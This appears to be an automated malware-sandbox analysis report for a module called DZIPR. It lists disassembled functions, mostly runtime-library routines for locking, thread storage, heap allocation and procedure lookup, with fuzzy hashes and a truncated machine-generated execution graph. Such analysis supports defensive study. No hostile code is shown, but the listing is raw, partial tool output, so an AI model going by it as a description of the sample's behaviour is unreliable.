                                          • API ID: AddressProc$Module$ErrorFileHandleLastName
                                          • String ID:
                                          • API String ID: 2524245154-3916222277
                                          • Opcode ID: 56886a62a0c1f7cfdfe6c9ecd3f5adc9b80988477906a6180afae48ccbad221c
                                          • Instruction ID: ccd164fa1cdbdb2dae94446fc5248901e97871648895e5440647178615ecfc6b
                                          • Opcode Fuzzy Hash: 56886a62a0c1f7cfdfe6c9ecd3f5adc9b80988477906a6180afae48ccbad221c
                                          • Instruction Fuzzy Hash: 4C216A709007189ADB20DF70C8987EAB7F9BF05324F1086ADD069D6180DB78AAC9CF54
                                          Function 6FA48E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FA48E78
                                          • PathFindExtensionW.SHLWAPI(?), ref: 6FA48E8E
                                            • Part of subcall function 6FA48BDF: __EH_prolog3_GS.LIBCMT ref: 6FA48BE9
                                            • Part of subcall function 6FA48BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FA48EB7,?,?), ref: 6FA48C19
                                            • Part of subcall function 6FA48BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FA48C2D
                                            • Part of subcall function 6FA48BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA48C69
                                            • Part of subcall function 6FA48BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA48C77
                                            • Part of subcall function 6FA48BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FA48C94
                                            • Part of subcall function 6FA48BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA48CBF
                                            • Part of subcall function 6FA48BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FA48CC8
                                            • Part of subcall function 6FA48BDF: GetModuleFileNameW.KERNEL32(6FA40000,?,00000105), ref: 6FA48D7F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                          • String ID: %s%s.dll
                                          • API String ID: 1311856149-1649984862
                                          • Opcode ID: 2f5df810b20236dabfd6e3b22bac80f52471baf055bedd5d7dc6720c10a53f67
                                          • Instruction ID: 4a9a0859334fe854700d61de8263f00569c507454a3b86d15a12cdcfdf4b998f
                                          • Opcode Fuzzy Hash: 2f5df810b20236dabfd6e3b22bac80f52471baf055bedd5d7dc6720c10a53f67
                                          • Instruction Fuzzy Hash: 9F01D671A09618ABCB01CBA8E885DEFB3FDFF4A310F0100A9A405E7140DA74DA85CB90
                                          Function 6FA5C53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FA55017: __getptd.LIBCMT ref: 6FA5501D
                                            • Part of subcall function 6FA55017: __getptd.LIBCMT ref: 6FA5502D
                                          • __getptd.LIBCMT ref: 6FA5C54B
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __getptd.LIBCMT ref: 6FA5C559
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          • Opcode ID: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
                                          • Instruction ID: 1428bba962eebf96651945702df1a70890b3db4ee7412cc1148a8214651793ea
                                          • Opcode Fuzzy Hash: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
                                          • Instruction Fuzzy Hash: 5F01AD708443019FCF208FB0C44069EBBB9AF10218F68042FD8429A6A5CB3CE6F1DF51
                                          Function 6FA4BF5D Relevance: 5.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 6FA4BFBC
                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FA4BFCC
                                          • LocalFree.KERNEL32(?), ref: 6FA4BFD5
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FA4BFE7
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                          • String ID:
                                          • API String ID: 2949335588-0
                                          • Opcode ID: 605128c5e6ef6bfc39aa7d9491ca99a663fcd7f065bcee6b100e9f0f2d11bba5
                                          • Instruction ID: c8b47b3f93d9fc419ba9b22d0d914f8976775bc1989e1c22fa0bf58e52daf693
                                          • Opcode Fuzzy Hash: 605128c5e6ef6bfc39aa7d9491ca99a663fcd7f065bcee6b100e9f0f2d11bba5
                                          • Instruction Fuzzy Hash: 7C115631600704EFDB14CF64C884FAAB7A8FF4A365F10852AE15A8B5A1CB75F891CF20
                                          Function 6FA4C220 Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(6FA734A8,?,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4C25A
                                          • InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4C26C
                                          • LeaveCriticalSection.KERNEL32(6FA734A8,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4C279
                                          • EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4C289
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                          • String ID:
                                          • API String ID: 2895727460-0
                                          • Opcode ID: 2579aec95c204267e015463f38c2f603fe93c20714e6637674f11302661b0f10
                                          • Instruction ID: 947e859d5111ebba6358064a0a767af05614f41e93d2119d10c4823c7e694e80
                                          • Opcode Fuzzy Hash: 2579aec95c204267e015463f38c2f603fe93c20714e6637674f11302661b0f10
                                          • Instruction Fuzzy Hash: 9BF0F677104714AFCF241A99CC86F15BB6DEFD3375F260016E28C8A241CF78A4D6CAA2
                                          Function 6FA4BA5B Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(6FA732EC,?,?,?,?,6FA4C0B7,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4BA69
                                          • TlsGetValue.KERNEL32(6FA732D0,?,?,?,6FA4C0B7,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BA7D
                                          • LeaveCriticalSection.KERNEL32(6FA732EC,?,?,?,6FA4C0B7,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BA93
                                          • LeaveCriticalSection.KERNEL32(6FA732EC,?,?,?,6FA4C0B7,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BA9E
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterValue
                                          • String ID:
                                          • API String ID: 3969253408-0
                                          • Opcode ID: d80a3f817ca2a92ceba2fdd609be0368c5852a4e42442bdde28e4e356888e8bc
                                          • Instruction ID: 5f48c1e51b5195e902ad71c07cab34d901346c921e839042046842741960a4a8
                                          • Opcode Fuzzy Hash: d80a3f817ca2a92ceba2fdd609be0368c5852a4e42442bdde28e4e356888e8bc
                                          • Instruction Fuzzy Hash: 66F054762547049FDB208F58C888C5E77ADEF863B03198965E65993101D634F892DBB0

                                          Execution Graph

                                          Execution Coverage:3.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:1917
                                          Total number of Limit Nodes:28
                                          execution_graph 20264 6c52fb4b 20265 6c52fb7b RtlLeaveCriticalSection 20264->20265 20266 6c52fb5c 20264->20266 20266->20265 20267 6c52fb63 20266->20267 20270 6c52a83a RtlLeaveCriticalSection 20267->20270 20269 6c52fb78 20270->20269 20271 6c52434c 20274 6c52433c 20271->20274 20273 6c524359 moneypunct 20277 6c529ec0 20274->20277 20276 6c52434a 20276->20273 20278 6c529ecc ___lock_fhandle 20277->20278 20279 6c52a914 __lock 67 API calls 20278->20279 20281 6c529ed3 20279->20281 20284 6c524618 __setenvp 67 API calls 20281->20284 20285 6c529f0c 20281->20285 20286 6c529f03 20281->20286 20282 6c524618 __setenvp 67 API calls 20282->20285 20283 6c529f1d ___lock_fhandle 20283->20276 20284->20286 20287 6c529f27 20285->20287 20286->20282 20290 6c52a83a RtlLeaveCriticalSection 20287->20290 20289 6c529f2e 20289->20283 20290->20289 20503 6c51db09 20504 6c51a939 94 API calls 20503->20504 20505 6c51db14 20504->20505 20506 6c51db56 20505->20506 20508 6c51db21 20505->20508 20507 6c516d89 ctype RaiseException 20506->20507 20509 6c51db5b 20507->20509 20510 6c527637 __msize 68 API calls 20508->20510 20511 6c51db27 20510->20511 20512 6c51db40 20511->20512 20513 6c51db32 20511->20513 20517 6c527a3a 20512->20517 20514 6c524618 __setenvp 67 API calls 20513->20514 20516 6c51db3a 20514->20516 20518 6c527a46 ___lock_fhandle 20517->20518 20519 6c527a56 20518->20519 20520 6c527a75 20518->20520 20521 6c525348 __cftof2_l 67 API calls 20519->20521 20522 6c527a8a 20520->20522 20523 6c527a7d 20520->20523 20526 6c527a5b 20521->20526 20524 6c527b32 RtlSizeHeap RtlReAllocateHeap 20522->20524 20525 6c527a97 20522->20525 20527 6c525348 __cftof2_l 67 API calls 20523->20527 20531 6c527a6b ___lock_fhandle __dosmaperr 20524->20531 20533 6c527b60 20524->20533 20528 6c52a914 __lock 67 API calls 20525->20528 20529 6c52815c __cftof2_l 6 API calls 20526->20529 20527->20531 20532 6c527a9e ___sbh_resize_block ___sbh_find_block 20528->20532 20529->20531 20531->20516 20541 6c527b29 20532->20541 20537 6c527b02 20533->20537 20544 6c5279bb 20533->20544 20534 6c525348 __cftof2_l 67 API calls 20535 6c527b07 GetLastError 20534->20535 20535->20531 20537->20531 20537->20534 20540 6c527ae5 RtlReAllocateHeap 20540->20531 20540->20537 20553 6c52a83a RtlLeaveCriticalSection 20541->20553 20543 6c527ad9 20543->20531 20543->20540 20545 6c5279ce GetModuleHandleW 20544->20545 20550 6c5279ef 20544->20550 20547 6c5279dd GetProcAddress 20545->20547 20545->20550 20546 6c52a02a _raise 6 API calls 20548 6c527a04 20546->20548 20549 6c529fb8 __encode_pointer 6 API calls 20547->20549 20551 6c527a24 20548->20551 20552 6c52a033 __decode_pointer 6 API calls 20548->20552 20549->20550 20550->20546 20551->20537 20552->20551 20553->20543 18308 6c512820 18319 6c5137c0 18308->18319 18311 6c512b50 104 API calls 18312 6c512857 18311->18312 18313 6c512b50 104 API calls 18312->18313 18314 6c512864 18313->18314 18329 6c5139b0 18314->18329 18318 6c5128c0 18320 6c513810 18319->18320 18321 6c513847 18320->18321 18322 6c511690 ctype 70 API calls 18320->18322 18323 6c523d6c 69 API calls 18321->18323 18322->18321 18324 6c513865 18323->18324 18325 6c51afc3 69 API calls 18324->18325 18326 6c513873 18325->18326 18327 6c51284a 18326->18327 18328 6c5113f0 70 API calls 18326->18328 18327->18311 18328->18327 18330 6c517268 70 API calls 18329->18330 18331 6c5139ee 18330->18331 18332 6c511990 67 API calls 18331->18332 18333 6c513a0a 18332->18333 18334 6c517268 70 API calls 18333->18334 18336 6c513a19 18334->18336 18335 6c513a40 18338 6c512370 70 API calls 18335->18338 18336->18335 18337 6c511690 ctype 70 API calls 18336->18337 18337->18335 18339 6c513a69 18338->18339 18340 6c511690 ctype 70 API calls 18339->18340 18341 6c513a87 18339->18341 18340->18341 18342 6c511a10 82 API calls 18341->18342 18343 6c513b12 18342->18343 18344 6c513b77 18343->18344 18345 6c513b16 18343->18345 18346 6c513b81 18344->18346 18347 6c513c3b 18344->18347 18348 6c511000 105 API calls 18345->18348 18349 6c513090 70 API calls 18346->18349 18350 6c512c10 139 API calls 18347->18350 18351 6c513b28 18348->18351 18352 6c513b8c 18349->18352 18353 6c513c49 18350->18353 18354 6c513e60 83 API calls 18351->18354 18355 6c5131f0 105 API calls 18352->18355 18356 6c5115f0 70 API calls 18353->18356 18357 6c513b35 18354->18357 18358 6c513b9f 18355->18358 18366 6c513b65 18356->18366 18359 6c515070 155 API calls 18357->18359 18360 6c512600 104 API calls 18358->18360 18361 6c513b4c 18359->18361 18360->18366 18362 6c5112c0 ctype 70 API calls 18361->18362 18363 6c513b5a 18362->18363 18364 6c517202 ctype 72 API calls 18363->18364 18364->18366 18365 6c515590 139 API calls 18367 6c513d8b 18365->18367 18366->18365 18368 6c512490 72 API calls 18367->18368 18369 6c513e29 18368->18369 18370 6c511900 72 API calls 18369->18370 18371 6c512875 18370->18371 18372 6c513910 18371->18372 18375 6c515440 18372->18375 18374 6c51394b ctype 18374->18318 18376 6c515470 18375->18376 18381 6c51544f 18375->18381 18377 6c523d6c 69 API calls 18376->18377 18379 6c51547c 18377->18379 18378 6c51547f 18380 6c516dc1 ctype 2 API calls 18378->18380 18379->18374 18382 6c515484 18380->18382 18381->18376 18381->18378 15405 6c51aef1 15410 6c51c050 15405->15410 15407 6c51af00 15408 6c51af23 15407->15408 15421 6c51bb0c 15407->15421 15411 6c51c05c __EH_prolog3 15410->15411 15413 6c51c0aa 15411->15413 15427 6c51bd66 TlsAlloc 15411->15427 15431 6c51bc4e RtlEnterCriticalSection 15411->15431 15446 6c516dc1 15411->15446 15451 6c51ba5b RtlEnterCriticalSection 15413->15451 15418 6c51c0d0 ctype 15418->15407 15419 6c51c0bd 15458 6c51be0d 15419->15458 15422 6c51bb18 __EH_prolog3_catch 15421->15422 15423 6c51bb41 ctype 15422->15423 15839 6c51c220 15422->15839 15423->15407 15425 6c51bb27 15849 6c51c292 15425->15849 15428 6c51bd92 15427->15428 15429 6c51bd97 RtlInitializeCriticalSection 15427->15429 15482 6c516d89 15428->15482 15429->15411 15433 6c51bc71 15431->15433 15432 6c51bd30 _memset 15434 6c51bd47 RtlLeaveCriticalSection 15432->15434 15433->15432 15435 6c51bcaa 15433->15435 15436 6c51bcbf GlobalHandle GlobalUnlock 15433->15436 15434->15411 15488 6c5169d7 15435->15488 15438 6c5169d7 ctype 70 API calls 15436->15438 15440 6c51bcdd GlobalReAlloc 15438->15440 15441 6c51bce9 15440->15441 15442 6c51bd10 GlobalLock 15441->15442 15443 6c51bd02 RtlLeaveCriticalSection 15441->15443 15444 6c51bcf4 GlobalHandle GlobalLock 15441->15444 15442->15432 15445 6c516d89 ctype RaiseException 15443->15445 15444->15443 15445->15442 15447 6c52527b __CxxThrowException@8 RaiseException 15446->15447 15448 6c516ddc __EH_prolog3 15447->15448 15827 6c51ba28 LocalAlloc 15448->15827 15450 6c516df3 ctype 15450->15411 15452 6c51ba76 15451->15452 15453 6c51ba9d RtlLeaveCriticalSection 15451->15453 15452->15453 15454 6c51ba7b TlsGetValue 15452->15454 15455 6c51baa6 15453->15455 15454->15453 15456 6c51ba87 15454->15456 15455->15418 15455->15419 15456->15453 15457 6c51ba8c RtlLeaveCriticalSection 15456->15457 15457->15455 15831 6c5250fc 15458->15831 15460 6c51be19 RtlEnterCriticalSection 15461 6c51bf1c RtlLeaveCriticalSection 15460->15461 15462 6c51be38 15460->15462 15467 6c51bf3f ctype 15461->15467 15462->15461 15464 6c51be41 TlsGetValue 15462->15464 15465 6c51be7f 15464->15465 15477 6c51be4f 15464->15477 15466 6c51ba28 ctype 2 API calls 15465->15466 15468 6c51be89 15466->15468 15467->15418 15832 6c51bbbf 15468->15832 15469 6c51bec4 15472 6c5169d7 ctype 70 API calls 15469->15472 15470 6c51be69 15471 6c5169d7 ctype 70 API calls 15470->15471 15473 6c51be73 LocalAlloc 15471->15473 15475 6c51bed0 LocalReAlloc 15472->15475 15476 6c51bedc 15473->15476 15475->15476 15478 6c51bee0 RtlLeaveCriticalSection 15476->15478 15479 6c51beee _memset 15476->15479 15477->15461 15477->15469 15477->15470 15480 6c516d89 ctype RaiseException 15478->15480 15481 6c51bf07 TlsSetValue 15479->15481 15480->15479 15481->15461 15485 6c52527b 15482->15485 15484 6c516da4 15486 6c5252b0 RaiseException 15485->15486 15487 6c5252a4 15485->15487 15486->15484 15487->15486 15489 6c5169ec ctype 15488->15489 15490 6c5169f9 GlobalAlloc 15489->15490 15492 6c511690 15489->15492 15490->15441 15493 6c5116a0 15492->15493 15494 6c51169b 15492->15494 15500 6c516a83 15493->15500 15495 6c516d89 ctype RaiseException 15494->15495 15495->15493 15498 6c5116c5 15498->15490 15499 6c511690 ctype 70 API calls 15499->15498 15501 6c516a8f __EH_prolog3 15500->15501 15511 6c5168e2 15501->15511 15503 6c516a96 ctype 15504 6c52527b __CxxThrowException@8 RaiseException 15503->15504 15505 6c516ac5 FormatMessageW 15504->15505 15507 6c516afc 15505->15507 15508 6c5116a6 15505->15508 15515 6c516a35 15507->15515 15508->15498 15508->15499 15510 6c516b0c LocalFree 15510->15508 15512 6c5168ea 15511->15512 15514 6c51690c 15512->15514 15518 6c5249fe 15512->15518 15514->15503 15818 6c5244cb 15515->15818 15517 6c516a4b ctype 15517->15510 15519 6c524a10 15518->15519 15520 6c524ab1 15518->15520 15527 6c524aa9 15519->15527 15528 6c524a6d RtlAllocateHeap 15519->15528 15530 6c524a9d 15519->15530 15533 6c524aa2 15519->15533 15535 6c52c046 15519->15535 15544 6c52be9b 15519->15544 15578 6c525c53 15519->15578 15581 6c5249af 15519->15581 15589 6c52c08e 15519->15589 15521 6c52c08e _malloc 6 API calls 15520->15521 15522 6c524ab7 15521->15522 15524 6c525348 __cftof2_l 66 API calls 15522->15524 15524->15527 15527->15512 15528->15519 15592 6c525348 15530->15592 15534 6c525348 __cftof2_l 66 API calls 15533->15534 15534->15527 15595 6c530cfc 15535->15595 15538 6c52c05a 15540 6c52be9b __NMSG_WRITE 67 API calls 15538->15540 15542 6c52c07c 15538->15542 15539 6c530cfc __set_error_mode 67 API calls 15539->15538 15541 6c52c072 15540->15541 15543 6c52be9b __NMSG_WRITE 67 API calls 15541->15543 15542->15519 15543->15542 15545 6c52beaf 15544->15545 15546 6c530cfc __set_error_mode 64 API calls 15545->15546 15577 6c52c00a 15545->15577 15547 6c52bed1 15546->15547 15548 6c52c00f GetStdHandle 15547->15548 15550 6c530cfc __set_error_mode 64 API calls 15547->15550 15549 6c52c01d _strlen 15548->15549 15548->15577 15553 6c52c036 WriteFile 15549->15553 15549->15577 15551 6c52bee2 15550->15551 15551->15548 15552 6c52bef4 15551->15552 15552->15577 15604 6c530997 15552->15604 15553->15577 15556 6c52bf2a GetModuleFileNameA 15558 6c52bf48 15556->15558 15562 6c52bf6b _strlen 15556->15562 15560 6c530997 _strcpy_s 64 API calls 15558->15560 15561 6c52bf58 15560->15561 15561->15562 15563 6c528034 __invoke_watson 10 API calls 15561->15563 15573 6c52bfae 15562->15573 15620 6c530c47 15562->15620 15563->15562 15566 6c52bfd2 15570 6c530bd3 _strcat_s 64 API calls 15566->15570 15569 6c528034 __invoke_watson 10 API calls 15569->15566 15572 6c52bfe6 15570->15572 15571 6c528034 __invoke_watson 10 API calls 15571->15573 15574 6c52bff7 15572->15574 15575 6c528034 __invoke_watson 10 API calls 15572->15575 15629 6c530bd3 15573->15629 15638 6c530a6a 15574->15638 15575->15574 15577->15519 15698 6c525c28 GetModuleHandleW 15578->15698 15582 6c5249bb ___lock_fhandle 15581->15582 15583 6c5249ec ___lock_fhandle 15582->15583 15701 6c52a914 15582->15701 15583->15519 15585 6c5249d1 15708 6c52b126 15585->15708 15590 6c52a033 __decode_pointer 6 API calls 15589->15590 15591 6c52c09e 15590->15591 15591->15519 15762 6c52a206 GetLastError 15592->15762 15594 6c52534d 15594->15533 15596 6c530d0b 15595->15596 15597 6c525348 __cftof2_l 67 API calls 15596->15597 15598 6c52c04d 15596->15598 15599 6c530d2e 15597->15599 15598->15538 15598->15539 15601 6c52815c 15599->15601 15602 6c52a033 __decode_pointer 6 API calls 15601->15602 15603 6c52816c __invoke_watson 15602->15603 15605 6c5309a8 15604->15605 15606 6c5309af 15604->15606 15605->15606 15611 6c5309d5 15605->15611 15607 6c525348 __cftof2_l 67 API calls 15606->15607 15608 6c5309b4 15607->15608 15609 6c52815c __cftof2_l 6 API calls 15608->15609 15610 6c52bf16 15609->15610 15610->15556 15613 6c528034 15610->15613 15611->15610 15612 6c525348 __cftof2_l 67 API calls 15611->15612 15612->15608 15665 6c5255b0 15613->15665 15615 6c528061 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15616 6c52813d GetCurrentProcess TerminateProcess 15615->15616 15618 6c528131 __invoke_watson 15615->15618 15667 6c523f34 15616->15667 15618->15616 15619 6c52815a 15619->15556 15624 6c530c59 15620->15624 15621 6c530c5d 15622 6c525348 __cftof2_l 67 API calls 15621->15622 15623 6c52bf9b 15621->15623 15628 6c530c79 15622->15628 15623->15571 15623->15573 15624->15621 15624->15623 15626 6c530ca3 15624->15626 15625 6c52815c __cftof2_l 6 API calls 15625->15623 15626->15623 15627 6c525348 __cftof2_l 67 API calls 15626->15627 15627->15628 15628->15625 15630 6c530beb 15629->15630 15633 6c530be4 15629->15633 15631 6c525348 __cftof2_l 67 API calls 15630->15631 15632 6c530bf0 15631->15632 15634 6c52815c __cftof2_l 6 API calls 15632->15634 15633->15630 15636 6c530c1f 15633->15636 15635 6c52bfc1 15634->15635 15635->15566 15635->15569 15636->15635 15637 6c525348 __cftof2_l 67 API calls 15636->15637 15637->15632 15675 6c52a02a 15638->15675 15641 6c530a8d LoadLibraryA 15642 6c530aa2 GetProcAddress 15641->15642 15651 6c530bb7 15641->15651 15643 6c530ab8 15642->15643 15642->15651 15678 6c529fb8 TlsGetValue 15643->15678 15644 6c530b15 15660 6c530b3f 15644->15660 15688 6c52a033 TlsGetValue 15644->15688 15647 6c52a033 __decode_pointer 6 API calls 15647->15651 15648 6c52a033 __decode_pointer 6 API calls 15657 6c530b82 15648->15657 15651->15577 15652 6c52a033 __decode_pointer 6 API calls 15652->15660 15653 6c529fb8 __encode_pointer 6 API calls 15654 6c530ad3 GetProcAddress 15653->15654 15655 6c529fb8 __encode_pointer 6 API calls 15654->15655 15656 6c530ae8 GetProcAddress 15655->15656 15658 6c529fb8 __encode_pointer 6 API calls 15656->15658 15659 6c52a033 __decode_pointer 6 API calls 15657->15659 15662 6c530b6a 15657->15662 15661 6c530afd 15658->15661 15659->15662 15660->15648 15660->15662 15661->15644 15663 6c530b07 GetProcAddress 15661->15663 15662->15647 15664 6c529fb8 __encode_pointer 6 API calls 15663->15664 15664->15644 15666 6c5255bc __VEC_memzero 15665->15666 15666->15615 15668 6c523f3e IsDebuggerPresent 15667->15668 15669 6c523f3c 15667->15669 15671 6c52ee35 __invoke_watson 15668->15671 15669->15619 15672 6c527c7e SetUnhandledExceptionFilter UnhandledExceptionFilter 15671->15672 15673 6c527ca3 GetCurrentProcess TerminateProcess 15672->15673 15674 6c527c9b __invoke_watson 15672->15674 15673->15619 15674->15673 15676 6c529fb8 __encode_pointer 6 API calls 15675->15676 15677 6c52a031 15676->15677 15677->15641 15677->15644 15679 6c529fd0 15678->15679 15680 6c529ff1 GetModuleHandleW 15678->15680 15679->15680 15681 6c529fda TlsGetValue 15679->15681 15682 6c52a001 15680->15682 15683 6c52a00c GetProcAddress 15680->15683 15686 6c529fe5 15681->15686 15684 6c525bcf __crt_waiting_on_module_handle Sleep GetModuleHandleW 15682->15684 15685 6c529fe9 GetProcAddress 15683->15685 15687 6c52a007 15684->15687 15685->15653 15686->15680 15686->15685 15687->15683 15687->15685 15689 6c52a04b 15688->15689 15690 6c52a06c GetModuleHandleW 15688->15690 15689->15690 15693 6c52a055 TlsGetValue 15689->15693 15691 6c52a087 GetProcAddress 15690->15691 15692 6c52a07c 15690->15692 15695 6c52a064 15691->15695 15694 6c525bcf __crt_waiting_on_module_handle Sleep GetModuleHandleW 15692->15694 15697 6c52a060 15693->15697 15696 6c52a082 15694->15696 15695->15652 15696->15691 15696->15695 15697->15690 15697->15695 15699 6c525c3c GetProcAddress 15698->15699 15700 6c525c4c ExitProcess 15698->15700 15699->15700 15702 6c52a929 15701->15702 15703 6c52a93c RtlEnterCriticalSection 15701->15703 15717 6c52a851 15702->15717 15703->15585 15705 6c52a92f 15705->15703 15743 6c525bff 15705->15743 15710 6c52b154 15708->15710 15709 6c52b1ed 15712 6c5249dc 15709->15712 15757 6c52ad3d 15709->15757 15710->15709 15710->15712 15750 6c52ac8d 15710->15750 15714 6c5249f5 15712->15714 15761 6c52a83a RtlLeaveCriticalSection 15714->15761 15716 6c5249fc 15716->15583 15718 6c52a85d ___lock_fhandle 15717->15718 15719 6c52c046 __FF_MSGBANNER 67 API calls 15718->15719 15732 6c52a883 15718->15732 15720 6c52a872 15719->15720 15722 6c52be9b __NMSG_WRITE 67 API calls 15720->15722 15721 6c52a5c3 __malloc_crt 67 API calls 15723 6c52a89e 15721->15723 15725 6c52a879 15722->15725 15726 